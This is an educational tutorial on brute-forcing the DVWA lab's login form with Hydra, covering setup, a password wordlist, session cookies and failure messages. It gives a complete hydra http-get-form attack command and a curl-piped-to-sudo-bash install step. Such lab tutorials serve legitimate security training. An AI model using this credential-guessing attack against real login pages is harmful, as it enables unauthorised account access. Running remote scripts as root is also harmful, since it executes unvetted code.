Brute Force Attack DVWA with Hydra

Hello! Today I’m going to share a simple command using a couple of tools to break the DVWA brute force lab.

Note: This is an educational tutorial. I am not responsible for any misuse of this tutorial.

Prerequisites

For this tutorial, I’m using an Ubuntu machine, but you can use Kali Linux as well. First, let’s install the necessary tools.

Step 1: Install and Configure DVWA

To get started, we need to configure the DVWA project. You can clone the repository and set up an Apache server with PHP. Alternatively, you can install DVWA via Docker using the following container https://hub.docker.com/r/vulnerables/web-dvwa:

sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"

Figure 1: DVWA project installed on your machine

Step 2: Install Hydra

Next, we need to install Hydra tool for password craking. Even if you’re using Kali Linux, you may need to configure it:

git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure
make
sudo make install
hydra

Figure 2: Hydra command tool

Step 3: Prepare the Password Dictionary

You will need a dictionary of passwords. If you’re using Kali Linux, you can use the crunch tool to generate a password dictionary or install it on your linux machine. For this tutorial, I'm using a list of the 100k most used passwords from the Daniel Miessler repo.

Step 4: Identify the Target

Inspect the target page to identify the name of the password fields and the form submission method (GET in this case).

Figure 3: DVWA brute force attack

Figure 4: Form source code

Figure 5: Incorrect password

Step 5: Get the Failure Message

Identify the message that appears when the login fails, for example, “Username and/or password incorrect.”

Step 6: Get the Session ID

Obtain the session ID to avoid redirection. Depending on your browser, you can retrieve it in several ways, such as using a proxy.

Execute the Attack

The main command for the brute force attack with Hydra is:

hydra -L users.txt -P 100k-most-used-passwords-NCSC.txt localhost http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=medium; PHPSESSID=sessionID:Username and/or password incorrect." -V

Let’s explain the command

• -L list of users to crack
• -P dictionary of passwords
• -V mode verbose
• localhost address to attack
• http-get-form method GET used
• /DVWA/vulnerabilities/brute/ is the path
• Lastly, we pass the username and password variables to try

Finally, we get this result

Figure 6: password cracked

Figure 7: password obtained

This should guide you through the process of performing a brute force attack on DVWA using Hydra. Remember to use this knowledge responsibly.

Thanks for reading! I hope you found this tutorial helpful. Remember to use these tools responsibly. 🛡️💻

See you next time! 🚀😊